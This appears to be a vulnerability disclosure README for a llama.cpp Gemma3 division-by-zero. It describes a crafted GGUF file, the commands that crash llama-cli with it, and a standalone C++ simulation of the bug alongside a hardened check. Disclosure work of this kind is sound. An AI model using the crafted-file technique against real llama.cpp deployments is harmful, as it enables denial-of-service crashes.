Commit 2ce58b4 by salvepilo: Add README
---
license: mit
tags:
- security
- llama.cpp
- gguf
- poc
---
# llama.cpp Gemma3 Integer Division-by-Zero PoC
Proof-of-concept for an integer division-by-zero in llama.cpp's Gemma3 architecture loader, reachable from nothing more than the key/value metadata of a crafted GGUF file.
**Vulnerable file:** `src/models/gemma3.cpp:32`
## Files
- `poc_gemma3_divzero.gguf` — 235-byte malicious GGUF (no tensors, triggers SIGFPE on x86_64)
- `reproducer.cpp` — standalone C++ reproducer (no llama.cpp build needed)
## Quick test
```bash
# Standalone (no llama.cpp needed)
g++ -o reproducer reproducer.cpp -fsanitize=undefined -fno-sanitize-recover=all
./reproducer
# Expected: runtime error: division by zero
# With llama.cpp
./llama-cli -m poc_gemma3_divzero.gguf -p 'hello'
# Expected on x86_64: Floating point exception (exit 136)
```
## Root cause
When `block_count=62` (which the loader maps to `LLM_TYPE_27B`) and the `attention.head_count` key is absent from the GGUF metadata, `n_head(0)` returns 0 and the expression `n_embd / n_head(0)` is an integer division by zero. The divisor comes straight from file metadata and is used while the hyperparameters are being set up, so no tensor data is needed to reach it; that is why the PoC file is only 235 bytes.
Integer division by zero is undefined behaviour in C++. On x86_64 it traps (SIGFPE, shell exit status 136); on aarch64 the hardware returns 0 and the process carries on silently, so on non-x86 hosts the UBSan build of `reproducer.cpp` is the reliable way to confirm the bug.
Reported via the [Huntr](https://huntr.com) bug bounty program.
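To make the root cause concrete, here is an added standalone C++ example. It is not the page's `reproducer.cpp` and not llama.cpp code: the `hparams` struct, `load_gemma3_hparams` and the `block_count == 62` mapping are a simplified model of the loader written for this example (field names follow llama.cpp, the bodies are mine), the sample values 5376 and 32 are constructed, and `embd_per_head_checked` is a validation I would add before the division, not llama.cpp's actual fix.

```cpp
#include <array>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <stdexcept>

// Simplified stand-in for the slice of llama.cpp hparams this bug touches.
// Names mirror llama.cpp (n_embd, n_head_arr, n_head(il), LLAMA_MAX_LAYERS);
// the struct itself is constructed for this example, not the project's code.
constexpr uint32_t LLAMA_MAX_LAYERS = 512;

enum llm_type { LLM_TYPE_UNKNOWN, LLM_TYPE_27B };

struct hparams {
    uint32_t n_embd  = 0;
    uint32_t n_layer = 0;
    // Per-layer head counts, zero-initialised so that a GGUF without
    // attention.head_count leaves every entry at 0 (the PoC's state).
    std::array<uint32_t, LLAMA_MAX_LAYERS> n_head_arr{};

    uint32_t n_head(uint32_t il = 0) const { return n_head_arr[il]; }
};

// Assumed loader behaviour: block_count 62 maps to LLM_TYPE_27B (from the
// README); every other value is treated as unknown here.
llm_type gemma3_type_from_block_count(uint32_t block_count) {
    return block_count == 62 ? LLM_TYPE_27B : LLM_TYPE_UNKNOWN;
}

// Simulates reading the GGUF metadata. head_count == 0 stands for the key
// being absent, which is exactly what the PoC file does.
hparams load_gemma3_hparams(uint32_t n_embd, uint32_t block_count, uint32_t head_count) {
    hparams hp;
    hp.n_embd  = n_embd;
    hp.n_layer = block_count;
    if (head_count != 0) {
        for (uint32_t il = 0; il < block_count && il < LLAMA_MAX_LAYERS; ++il) {
            hp.n_head_arr[il] = head_count;
        }
    }
    return hp;
}

// The expression from the README, unchanged: integer division by n_head(0).
// With the PoC's hparams this is UB and raises SIGFPE on x86_64.
uint32_t embd_per_head_vulnerable(const hparams & hp) {
    return hp.n_embd / hp.n_head(0);
}

// Hardened form (added here; not llama.cpp's actual fix): validate the
// attacker-controlled divisor read from the file before dividing by it.
uint32_t embd_per_head_checked(const hparams & hp) {
    const uint32_t nh = hp.n_head(0);
    if (nh == 0) {
        throw std::runtime_error("gemma3: attention.head_count missing or zero");
    }
    if (hp.n_embd % nh != 0) {
        throw std::runtime_error("gemma3: n_embd is not a multiple of n_head");
    }
    return hp.n_embd / nh;
}

// True when the checked loader rejects the given hparams.
bool loader_rejects(const hparams & hp) {
    try {
        (void) embd_per_head_checked(hp);
        return false;
    } catch (const std::runtime_error &) {
        return true;
    }
}

int main(int argc, char ** argv) {
    // Constructed sample values: 5376 / 32 = 168, a well-formed 27B-style file.
    const hparams good = load_gemma3_hparams(5376, 62, 32);
    // The PoC's state: block_count 62, no attention.head_count key.
    const hparams bad  = load_gemma3_hparams(5376, 62, 0);

    std::printf("type(block_count=62) = %s\n",
                gemma3_type_from_block_count(62) == LLM_TYPE_27B ? "LLM_TYPE_27B" : "unknown");
    std::printf("good: n_embd / n_head(0) = %u\n", embd_per_head_checked(good));
    std::printf("bad : checked loader rejects = %s\n", loader_rejects(bad) ? "yes" : "no");

    // The crash is opt-in so the default run completes.
    if (argc > 1 && std::strcmp(argv[1], "--crash") == 0) {
        std::printf("bad : calling vulnerable path (expect SIGFPE on x86_64)\n");
        std::printf("%u\n", embd_per_head_vulnerable(bad));
    }
    return 0;
}
```

Build it the same way the README builds `reproducer.cpp` (`g++ -o demo demo.cpp -fsanitize=undefined -fno-sanitize-recover=all`, file name mine) and run `./demo --crash`: the default run exercises only the checked path and exits cleanly, while `--crash` drives the README's expression with the PoC's hparams, which UBSan reports as "division by zero" on any architecture and which traps with SIGFPE on x86_64 without the sanitizer.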